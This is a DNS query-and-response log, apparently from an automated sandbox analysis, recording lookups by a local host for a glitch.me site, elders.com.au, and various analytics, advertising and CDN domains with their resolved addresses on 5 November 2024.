                                                                                                                                    Nov 5, 2024 09:03:23.365657091 CET192.168.2.41.1.1.10x1a69Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.366022110 CET192.168.2.41.1.1.10xae65Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.526477098 CET192.168.2.41.1.1.10x34f3Standard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.526650906 CET192.168.2.41.1.1.10x8718Standard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.562035084 CET192.168.2.41.1.1.10x478cStandard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.562213898 CET192.168.2.41.1.1.10x5f65Standard query (0)unpkg.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.115758896 CET192.168.2.41.1.1.10x5157Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.116169930 CET192.168.2.41.1.1.10xe460Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.214582920 CET192.168.2.41.1.1.10x4bb5Standard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.214746952 CET192.168.2.41.1.1.10x36b5Standard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.572804928 CET192.168.2.41.1.1.10xb3aaStandard query (0)cdn.mouseflow.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.572951078 CET192.168.2.41.1.1.10xc4c5Standard query (0)cdn.mouseflow.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.127161980 CET192.168.2.41.1.1.10xc7b5Standard query (0)w.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.128139019 CET192.168.2.41.1.1.10xc448Standard query (0)w.clarity.ms65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.425957918 CET192.168.2.41.1.1.10xdae7Standard query (0)eldersrural.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.426331997 CET192.168.2.41.1.1.10x1974Standard query (0)eldersrural.demdex.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.427001953 CET192.168.2.41.1.1.10xe822Standard query (0)cm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.427521944 CET192.168.2.41.1.1.10x5654Standard query (0)cm.everesttech.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.559561968 CET192.168.2.41.1.1.10x18e8Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.560167074 CET192.168.2.41.1.1.10x3049Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.638851881 CET192.168.2.41.1.1.10x3bcStandard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.639230967 CET192.168.2.41.1.1.10xb376Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.205836058 CET192.168.2.41.1.1.10xc426Standard query (0)eldersrural.sc.omtrdc.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.206182003 CET192.168.2.41.1.1.10x2f7aStandard query (0)eldersrural.sc.omtrdc.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.509999037 CET192.168.2.41.1.1.10x922Standard query (0)cdn.mouseflow.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.510332108 CET192.168.2.41.1.1.10xc8f6Standard query (0)cdn.mouseflow.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.712738991 CET192.168.2.41.1.1.10x9fb1Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.714168072 CET192.168.2.41.1.1.10x84e3Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:29.020421028 CET192.168.2.41.1.1.10x46b3Standard query (0)eldersrural.sc.omtrdc.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:29.020942926 CET192.168.2.41.1.1.10xb0d8Standard query (0)eldersrural.sc.omtrdc.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.616936922 CET192.168.2.41.1.1.10x4f0cStandard query (0)yourir.infoA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.617988110 CET192.168.2.41.1.1.10x7241Standard query (0)yourir.info65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.646918058 CET192.168.2.41.1.1.10x2412Standard query (0)apimprd.ext.elders.com.au65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.646918058 CET192.168.2.41.1.1.10xaa02Standard query (0)apimprd.ext.elders.com.auA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.735502005 CET192.168.2.41.1.1.10x2bc6Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.735502005 CET192.168.2.41.1.1.10x8c27Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:33.455333948 CET192.168.2.41.1.1.10x50bStandard query (0)yourir.infoA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:33.455672979 CET192.168.2.41.1.1.10xdfd8Standard query (0)yourir.info65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:35.218544960 CET192.168.2.41.1.1.10x4129Standard query (0)apimprd.ext.elders.com.auA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:35.218775988 CET192.168.2.41.1.1.10xb2d3Standard query (0)apimprd.ext.elders.com.au65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:35.605671883 CET192.168.2.41.1.1.10xf441Standard query (0)apimprd.ext.elders.com.auA (IP address)IN (0x0001)false
                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Nov 5, 2024 09:02:15.157655001 CET1.1.1.1192.168.2.40x7953No error (0)astonishing-maize-sunstone.glitch.me54.81.94.16A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:15.157655001 CET1.1.1.1192.168.2.40x7953No error (0)astonishing-maize-sunstone.glitch.me34.237.25.55A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:16.376303911 CET1.1.1.1192.168.2.40x2b0dNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:16.376868010 CET1.1.1.1192.168.2.40x2bf8No error (0)www.google.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:16.475200891 CET1.1.1.1192.168.2.40x7d43No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:16.475671053 CET1.1.1.1192.168.2.40x58f6No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:18.389192104 CET1.1.1.1192.168.2.40x5732No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:18.389413118 CET1.1.1.1192.168.2.40x2129No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:18.544234037 CET1.1.1.1192.168.2.40xc939No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:18.545212984 CET1.1.1.1192.168.2.40xea7fNo error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:19.189534903 CET1.1.1.1192.168.2.40xf7dcNo error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:19.189841032 CET1.1.1.1192.168.2.40x9b57No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:21.073659897 CET1.1.1.1192.168.2.40x51fbNo error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.330089092 CET1.1.1.1192.168.2.40x8323No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.345477104 CET1.1.1.1192.168.2.40x9a56No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.345477104 CET1.1.1.1192.168.2.40x9a56No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.129A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.345477104 CET1.1.1.1192.168.2.40x9a56No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.77A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.345477104 CET1.1.1.1192.168.2.40x9a56No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.14A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.345477104 CET1.1.1.1192.168.2.40x9a56No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.44A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.364202976 CET1.1.1.1192.168.2.40xd962No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:23.997831106 CET1.1.1.1192.168.2.40xaa59No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:23.997831106 CET1.1.1.1192.168.2.40xaa59No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.44A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:23.997831106 CET1.1.1.1192.168.2.40xaa59No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.77A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:23.997831106 CET1.1.1.1192.168.2.40xaa59No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.14A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:23.997831106 CET1.1.1.1192.168.2.40xaa59No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.129A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:24.018599987 CET1.1.1.1192.168.2.40x72b9No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:27.230848074 CET1.1.1.1192.168.2.40x34d7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:27.230848074 CET1.1.1.1192.168.2.40x34d7No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:29.249054909 CET1.1.1.1192.168.2.40xd593No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:29.249054909 CET1.1.1.1192.168.2.40xd593No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:37.018357992 CET1.1.1.1192.168.2.40x32ebNo error (0)milo.za.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:37.018357992 CET1.1.1.1192.168.2.40x32ebNo error (0)milo.za.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:37.019392014 CET1.1.1.1192.168.2.40x5dd8No error (0)milo.za.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:38.990324974 CET1.1.1.1192.168.2.40x17f6No error (0)milo.za.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:38.990324974 CET1.1.1.1192.168.2.40x17f6No error (0)milo.za.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:39.053056955 CET1.1.1.1192.168.2.40xb754No error (0)milo.za.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:41.496463060 CET1.1.1.1192.168.2.40x94a9No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:41.496463060 CET1.1.1.1192.168.2.40x94a9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:41.496463060 CET1.1.1.1192.168.2.40x94a9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:41.496463060 CET1.1.1.1192.168.2.40x94a9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:41.496463060 CET1.1.1.1192.168.2.40x94a9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:41.496463060 CET1.1.1.1192.168.2.40x94a9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:41.496463060 CET1.1.1.1192.168.2.40x94a9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:09.210180998 CET1.1.1.1192.168.2.40x39ecNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:09.210180998 CET1.1.1.1192.168.2.40x39ecNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:09.210180998 CET1.1.1.1192.168.2.40x39ecNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:15.793626070 CET1.1.1.1192.168.2.40xfe5cNo error (0)elders.com.au65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.005954027 CET1.1.1.1192.168.2.40x1262No error (0)elders.com.au162.159.140.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.005954027 CET1.1.1.1192.168.2.40x1262No error (0)elders.com.au172.66.0.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.959669113 CET1.1.1.1192.168.2.40xb1bNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.960656881 CET1.1.1.1192.168.2.40x393cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.961088896 CET1.1.1.1192.168.2.40xa3f9No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.961088896 CET1.1.1.1192.168.2.40xa3f9No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.961813927 CET1.1.1.1192.168.2.40xc0f8No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:17.471813917 CET1.1.1.1192.168.2.40x17a6No error (0)elders.com.au65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:17.603540897 CET1.1.1.1192.168.2.40xdb01No error (0)elders.com.au162.159.140.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:17.603540897 CET1.1.1.1192.168.2.40xdb01No error (0)elders.com.au172.66.0.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:19.406402111 CET1.1.1.1192.168.2.40x692fNo error (0)www.google.com216.58.212.164A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:19.406544924 CET1.1.1.1192.168.2.40x7dc7No error (0)www.google.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.494870901 CET1.1.1.1192.168.2.40x207cNo error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.494870901 CET1.1.1.1192.168.2.40x207cNo error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.494870901 CET1.1.1.1192.168.2.40x207cNo error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.494870901 CET1.1.1.1192.168.2.40x207cNo error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.494870901 CET1.1.1.1192.168.2.40x207cNo error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.495572090 CET1.1.1.1192.168.2.40x6eb8No error (0)unpkg.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.496638060 CET1.1.1.1192.168.2.40x6e3cNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.498164892 CET1.1.1.1192.168.2.40x98b9No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.510377884 CET1.1.1.1192.168.2.40xd56cNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.511743069 CET1.1.1.1192.168.2.40xcaa3No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.522661924 CET1.1.1.1192.168.2.40xdb12No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.522661924 CET1.1.1.1192.168.2.40xdb12No error (0)scontent.xx.fbcdn.net157.240.253.1A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.523190975 CET1.1.1.1192.168.2.40x24c0No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.523190975 CET1.1.1.1192.168.2.40x24c0No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.523190975 CET1.1.1.1192.168.2.40x24c0No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.194730997 CET1.1.1.1192.168.2.40x3ee5No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.194730997 CET1.1.1.1192.168.2.40x3ee5No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.194730997 CET1.1.1.1192.168.2.40x3ee5No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.194730997 CET1.1.1.1192.168.2.40x3ee5No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.194730997 CET1.1.1.1192.168.2.40x3ee5No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.195092916 CET1.1.1.1192.168.2.40xc5daNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.195092916 CET1.1.1.1192.168.2.40xc5daNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.198131084 CET1.1.1.1192.168.2.40x44fbNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.199400902 CET1.1.1.1192.168.2.40x3066No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.372955084 CET1.1.1.1192.168.2.40x1a69No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.372955084 CET1.1.1.1192.168.2.40x1a69No error (0)scontent.xx.fbcdn.net157.240.253.1A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.373168945 CET1.1.1.1192.168.2.40xae65No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.373168945 CET1.1.1.1192.168.2.40xae65No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.373168945 CET1.1.1.1192.168.2.40xae65No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.533473969 CET1.1.1.1192.168.2.40x34f3No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.533473969 CET1.1.1.1192.168.2.40x34f3No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.533473969 CET1.1.1.1192.168.2.40x34f3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.533473969 CET1.1.1.1192.168.2.40x34f3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.533685923 CET1.1.1.1192.168.2.40x8718No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.533685923 CET1.1.1.1192.168.2.40x8718No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.568850994 CET1.1.1.1192.168.2.40x478cNo error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.568850994 CET1.1.1.1192.168.2.40x478cNo error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.568850994 CET1.1.1.1192.168.2.40x478cNo error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.568850994 CET1.1.1.1192.168.2.40x478cNo error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.568850994 CET1.1.1.1192.168.2.40x478cNo error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:23.568861961 CET1.1.1.1192.168.2.40x5f65No error (0)unpkg.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.251.39.134A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.128.214.125A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.211.141.218A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.49.181.118A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.250.142.67A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.170.25.213A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.23.253A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.122725010 CET1.1.1.1192.168.2.40x5157No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.214.60.57A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.124245882 CET1.1.1.1192.168.2.40xe460No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.124245882 CET1.1.1.1192.168.2.40xe460No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.124245882 CET1.1.1.1192.168.2.40xe460No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.221421003 CET1.1.1.1192.168.2.40x4bb5No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.222251892 CET1.1.1.1192.168.2.40x36b5No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.579612970 CET1.1.1.1192.168.2.40xc4c5No error (0)cdn.mouseflow.comcdn.mouseflow.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:24.580070972 CET1.1.1.1192.168.2.40xb3aaNo error (0)cdn.mouseflow.comcdn.mouseflow.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.134279966 CET1.1.1.1192.168.2.40xc7b5No error (0)w.clarity.msclarity-ingest-eus-e-sc.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.134865999 CET1.1.1.1192.168.2.40xc448No error (0)w.clarity.msclarity-ingest-eus-e-sc.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
